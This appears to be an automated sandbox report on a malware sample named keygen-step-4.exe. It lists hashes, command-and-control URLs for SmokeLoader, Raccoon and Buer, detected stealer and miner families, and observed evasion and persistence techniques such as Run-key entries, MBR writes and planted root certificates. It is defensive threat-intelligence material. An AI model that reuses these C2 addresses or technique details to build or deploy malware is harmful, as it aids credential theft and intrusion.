Analysis
-
max time kernel
43s -
max time network
600s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-03-2021 07:08
Static task
static1
Behavioral task
behavioral1
Sample
keygen-step-4.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
keygen-step-4.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
keygen-step-4.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
keygen-step-4.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
keygen-step-4.exe
Resource
win7v20201028
General
-
Target
keygen-step-4.exe
-
Size
6.3MB
-
MD5
5f6a71ec27ed36a11d17e0989ffb0382
-
SHA1
a66b0e4d8ba90fc97e4d5eb37d7fbc12ade9a556
-
SHA256
a546a1f257585e2f4c093db2b7eeb6413a314ffb1296d97fd31d0363e827cc65
-
SHA512
d67e0f1627e5416aef1185aea2125c8502aac02b6d3e8eec301e344f5074bfce8b2aded37b2730a65c04b95b1ba6151e79048642ef1d0c9b32702f919b42f7b4
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
Extracted
raccoon
e71b51d358b75fe1407b56bf2284e3fac50c860f
-
url4cnc
https://telete.in/oidmrwednesday
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Extracted
buer
securedocumentsholding.com
Signatures
-
ElysiumStealer
ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.
-
ElysiumStealer Payload 3 IoCs
resource yara_rule behavioral3/files/0x000300000001abb5-132.dat elysiumstealer behavioral3/files/0x000300000001abb5-131.dat elysiumstealer behavioral3/memory/3356-143-0x00000000018A0000-0x00000000018A6000-memory.dmp elysiumstealer -
ElysiumStealer Support DLL 1 IoCs
resource yara_rule behavioral3/files/0x000100000001abbf-151.dat elysiumstealer_dll -
Glupteba Payload 3 IoCs
resource yara_rule behavioral3/memory/8124-675-0x0000000003990000-0x00000000041ED000-memory.dmp family_glupteba behavioral3/memory/8124-676-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral3/memory/8124-677-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral3/memory/6236-442-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral3/memory/9404-1497-0x00000000025E0000-0x000000000260E000-memory.dmp family_redline behavioral3/memory/9404-1499-0x0000000002800000-0x000000000282C000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Buer Loader 1 IoCs
Detects Buer loader in memory or disk.
resource yara_rule behavioral3/memory/5364-1247-0x0000000040000000-0x0000000040009000-memory.dmp buer -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Nirsoft 6 IoCs
resource yara_rule behavioral3/files/0x000300000001ab6c-72.dat Nirsoft behavioral3/files/0x000300000001ab6c-73.dat Nirsoft behavioral3/files/0x000100000001abb4-98.dat Nirsoft behavioral3/files/0x000100000001abb4-97.dat Nirsoft behavioral3/files/0x000100000001abc3-165.dat Nirsoft behavioral3/files/0x000100000001abc3-164.dat Nirsoft -
XMRig Miner Payload 1 IoCs
resource yara_rule behavioral3/memory/3948-428-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig -
Creates new service(s) 1 TTPs
-
Executes dropped EXE 23 IoCs
pid Process 2208 file.exe 2500 41C2.tmp.exe 4056 41C2.tmp.exe 1728 Setup.exe 3484 C0CA61A12E4C8B38.exe 3196 C0CA61A12E4C8B38.exe 3172 Install.exe 3356 multitimer.exe 2484 askinstall20.exe 2140 1615014376525.exe 2220 md2_2efs.exe 2924 multitimer.exe 1960 multitimer.exe 2580 1615014382432.exe 2200 BTRSetp.exe 1312 7164603.78 3816 4124017.45 2380 1024029.11 3356 6477954.71 4132 gcttt.exe 4232 Windows Host.exe 4344 1615014388650.exe 4480 jfiag3g_gg.exe -
Modifies Windows Firewall 1 TTPs
-
resource yara_rule behavioral3/files/0x000300000001ab78-25.dat office_xlm_macros -
resource yara_rule behavioral3/files/0x000100000001abc9-175.dat upx behavioral3/files/0x000100000001abc9-174.dat upx -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1024029.11 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1024029.11 -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url 1024029.11 -
Loads dropped DLL 2 IoCs
pid Process 4064 MsiExec.exe 3356 6477954.71 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral3/files/0x000200000001abb4-125.dat themida behavioral3/files/0x000200000001abb4-126.dat themida behavioral3/memory/2380-156-0x0000000000B20000-0x0000000000B21000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pts5rywkbwb = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\M6V90HSJK4\\multitimer.exe\" 1 3.1615014594.60432ac2091c9" multitimer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe" 4124017.45 Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" gcttt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\1024029.11" 1024029.11 -
Checks for any installed AV software in registry 1 TTPs 53 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1024029.11 -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 37 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 110 ipinfo.io 801 checkip.amazonaws.com 949 ipinfo.io 248 ipinfo.io 927 checkip.amazonaws.com 975 ipinfo.io 1281 checkip.amazonaws.com 1458 ipinfo.io 79 ip-api.com 193 ipinfo.io 858 ipinfo.io 1542 ipinfo.io 220 checkip.amazonaws.com 418 ip-api.com 675 ipinfo.io 853 ipinfo.io 1178 ipinfo.io 1318 checkip.amazonaws.com 1649 checkip.amazonaws.com 26 api.ipify.org 679 ipinfo.io 922 ipinfo.io 1065 ipinfo.io 1212 ip-api.com 363 ipinfo.io 929 ipinfo.io 1036 ip-api.com 1547 ipinfo.io 798 ipinfo.io 1019 ipinfo.io 1301 ipinfo.io 1387 ipinfo.io 108 ipinfo.io 339 ipinfo.io 1092 ipinfo.io 1094 ipinfo.io 1462 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 Setup.exe File opened for modification \??\PhysicalDrive0 C0CA61A12E4C8B38.exe File opened for modification \??\PhysicalDrive0 C0CA61A12E4C8B38.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1728 Setup.exe 2380 1024029.11 -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2500 set thread context of 4056 2500 41C2.tmp.exe 82 PID 3484 set thread context of 3644 3484 C0CA61A12E4C8B38.exe 101 PID 3484 set thread context of 2412 3484 C0CA61A12E4C8B38.exe 112 PID 3484 set thread context of 4316 3484 C0CA61A12E4C8B38.exe 285 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 22 IoCs
pid pid_target Process procid_target 4368 4956 WerFault.exe 132 368 4956 WerFault.exe 132 3792 4956 WerFault.exe 132 5216 4956 WerFault.exe 132 5184 4956 WerFault.exe 132 5028 4956 WerFault.exe 132 5380 4956 WerFault.exe 132 1848 7236 WerFault.exe 365 6608 7236 WerFault.exe 365 5232 7236 WerFault.exe 365 5944 7236 WerFault.exe 365 4008 7236 WerFault.exe 365 3160 7236 WerFault.exe 365 6148 7236 WerFault.exe 365 6464 4536 WerFault.exe 421 7792 4536 WerFault.exe 421 6712 4536 WerFault.exe 421 196 4536 WerFault.exe 421 6496 4536 WerFault.exe 421 4904 4536 WerFault.exe 421 6508 4536 WerFault.exe 421 8236 7460 WerFault.exe 506 -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName C0CA61A12E4C8B38.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName C0CA61A12E4C8B38.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc C0CA61A12E4C8B38.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc C0CA61A12E4C8B38.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 41C2.tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 41C2.tmp.exe -
Delays execution with timeout.exe 5 IoCs
pid Process 7456 timeout.exe 5916 timeout.exe 7868 timeout.exe 640 timeout.exe 9084 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 13 IoCs
pid Process 6784 taskkill.exe 8792 taskkill.exe 860 TASKKILL.exe 4976 taskkill.exe 7000 taskkill.exe 7516 taskkill.exe 7524 taskkill.exe 400 taskkill.exe 8224 taskkill.exe 11044 taskkill.exe 1224 taskkill.exe 740 taskkill.exe 5992 taskkill.exe -
Modifies data under HKEY_USERS 1 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\PegasPc file.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 file.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e file.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffd